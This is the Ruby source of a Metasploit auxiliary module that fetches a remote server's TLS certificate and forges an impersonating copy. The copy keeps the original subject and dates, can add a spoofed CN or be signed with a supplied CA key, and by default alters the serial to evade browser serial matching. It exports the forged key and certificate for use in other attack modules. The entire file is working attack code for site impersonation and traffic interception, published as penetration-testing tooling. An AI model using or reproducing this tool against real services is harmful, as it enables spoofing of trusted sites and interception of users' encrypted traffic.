## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'HTTP SSL Certificate Impersonation', 'Author' => ' Chris John Riley', 'References' => [ ['URL', 'http://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles'] ], 'License' => MSF_LICENSE, 'Description' => %q{ This module request a copy of the remote SSL certificate and creates a local (self.signed) version using the information from the remote version. The module then Outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert Inputs for private key / CA cert have been provided for those with diginator certs hanging about! } )) register_options( [ Opt::RPORT(443), OptEnum.new('OUT_FORMAT', [true, "Output format", 'PEM', ['DER','PEM']]), OptString.new('EXPIRATION', [false, "Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)", nil]), OptPath.new('PRIVKEY', [false, "Sign the cert with your own CA private key", nil]), OptString.new('PRIVKEY_PASSWORD', [false, "Password for private key specified in PRIV_KEY (if applicable)", nil]), OptPath.new('CA_CERT', [false, "CA Public certificate", nil]), OptString.new('ADD_CN', [false, "Add CN to match spoofed site name (e.g. *.example.com)", nil]) ], self.class) register_advanced_options( [ OptBool.new('AlterSerial', [false, "Alter the serial number slightly to avoif FireFox serial matching", true]) ], self.class) end def run print_status("Connecting to #{rhost}:#{rport}") if not datastore['PRIVKEY'].nil? and not datastore['CA_CERT'].nil? print_status("Signing generated certificate with provided PRIVATE KEY and CA Certificate") if not datastore['PRIVKEY_PASSWORD'].nil? and not datastore['PRIVKEY_PASSWORD'].empty? ca_key = OpenSSL::PKey::RSA.new(File.read(datastore['PRIVKEY']), datastore['PRIVKEY_PASSWORD']) else ca_key = OpenSSL::PKey::RSA.new(File.read(datastore['PRIVKEY'])) end ca = OpenSSL::X509::Certificate.new(File.read(datastore['CA_CERT'])) elsif not datastore['PRIVKEY'].nil? or not datastore['CA_CERT'].nil? # error if both PRIVKEY and CA_CERT are not BOTH provided print_error("CA Certificate AND Private Key must be provided!") return end begin connect(true, {"SSL" => true}) # Force SSL even for RPORT != 443 cert = OpenSSL::X509::Certificate.new(sock.peer_cert) # Get certificate from remote rhost disconnect rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e rescue ::Timeout::Error, ::Errno::EPIPE => e print_error(e.message) end if not cert print_error("#{rhost}:#{rport} No certificate subject or CN found") return end print_status("Copying certificate from #{rhost}:#{rport}\n#{cert.subject.to_s} ") vprint_status("Original Certifcate Details\n\n#{cert.to_text}") begin keylength = /Key: \((\d+)/i.match(cert.signature_algorithm)[1] # Grab keylength from target cert rescue keylength = 1024 end begin hashtype = /Algorithm: (\w+)With/i.match(cert.to_text)[1] # Grab hashtype from target cert rescue hashtype = 'sha1' end new_cert = OpenSSL::X509::Certificate.new ef = OpenSSL::X509::ExtensionFactory.new # Duplicate information from the remote certificate entries = ['version','serial', 'subject', 'not_before','not_after'] entries.each do | ent | eval("new_cert.#{ent} = cert.#{ent}") end # add additional Common Name to the new cert if not datastore['ADD_CN'].nil? and not datastore['ADD_CN'].empty? new_cert.subject = OpenSSL::X509::Name.new(new_cert.subject.to_a << ["CN", "#{datastore['ADD_CN']}"]) print_status("Adding #{datastore['ADD_CN']} to the end of the certificate subject") vprint_status("Certificate Subject: #{new_cert.subject}") end if not datastore['EXPIRATION'].nil? and not datastore['EXPIRATION'].empty? # alter the not_after and not_before dates print_status("Altering certificate expiry information to #{datastore['EXPIRATION']}") case datastore['EXPIRATION'].downcase when 'yesterday' new_cert.not_after = 24.hours.ago new_cert.not_before = 1.year.ago - 24.hours # set start date (1 year cert) vprint_status("Certificate expiry date set to #{new_cert.not_after}") when 'now' new_cert.not_after = Time.now new_cert.not_before = 1.year.ago # set start date (1 year cert) vprint_status("Certificate expiry date set to #{new_cert.not_after}") else new_cert.not_after = Time.parse(datastore['EXPIRATION']) new_cert.not_before = Time.parse(datastore['EXPIRATION']) - 1.year # set start date (1 year cert) vprint_status("Certificate expiry date set to #{new_cert.not_after}") end end # Alter serial to avoid duplicate issuer/serial detection if datastore['AlterSerial'] if (cert.serial.to_s.length > 1) # alter last digits of the serial number new_cert.serial = (cert.serial.to_s[0..-2] + rand(0xFF).to_s).to_i else # serial is too small, create random serial vprint_error("The serial number of the original cert is too short. Creating new random serial") new_cert.serial = rand(0xFFFF) end else # match serial number new_cert.serial = cert.serial.to_s end if not datastore['PRIVKEY'].nil? and not datastore['PRIVKEY'].empty? new_cert.public_key = ca_key.public_key ef.subject_certificate = ca ef.issuer_certificate = ca new_cert.issuer = ca.subject print_status("Using private key #{datastore['PRIVKEY']}") else new_key = OpenSSL::PKey::RSA.new(keylength.to_i) new_cert.public_key = new_key.public_key ef.subject_certificate = new_cert ef.issuer_certificate = new_cert if not datastore['ADD_CN'].nil? and not datastore['ADD_CN'].empty? new_cert.issuer = new_cert.subject else new_cert.issuer = cert.subject end end new_cert.extensions = [ ef.create_extension("basicConstraints","CA:FALSE", true), ef.create_extension("subjectKeyIdentifier","hash"), ] if not datastore['PRIVKEY'].nil? and not datastore['PRIVKEY'].empty? new_cert.sign(ca_key, eval("OpenSSL::Digest::#{hashtype.upcase}.new")) new_key = ca_key # Set for file output else new_cert.sign(new_key, eval("OpenSSL::Digest::#{hashtype.upcase}.new")) end vprint_status("Duplicate Certificate Details\n\n#{new_cert.to_text}") print_status("Beginning export of certificate files") priv_key = new_key.send(eval("\"to_#{datastore['OUT_FORMAT'].downcase}\"")) cert_crt = new_cert.send(eval("\"to_#{datastore['OUT_FORMAT'].downcase}\"")) combined = new_key.send("to_pem") + new_cert.send("to_pem") addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB print_status("Creating looted key/crt/pem files for #{rhost}:#{rport}") p = store_loot("#{datastore['RHOST'].downcase}_key", datastore['OUT_FORMAT'].downcase, addr, priv_key, "imp_ssl.key", "Impersonate_SSL") print_good("key: #{p}") p = store_loot("#{datastore['RHOST'].downcase}_cert", datastore['OUT_FORMAT'].downcase, addr, cert_crt, "imp_ssl.crt", "Impersonate_SSL") print_good("crt: #{p}") p = store_loot("#{datastore['RHOST'].downcase}_pem", "pem", addr, combined, "imp_ssl.pem", "Impersonate_SSL") print_good("pem: #{p}") end end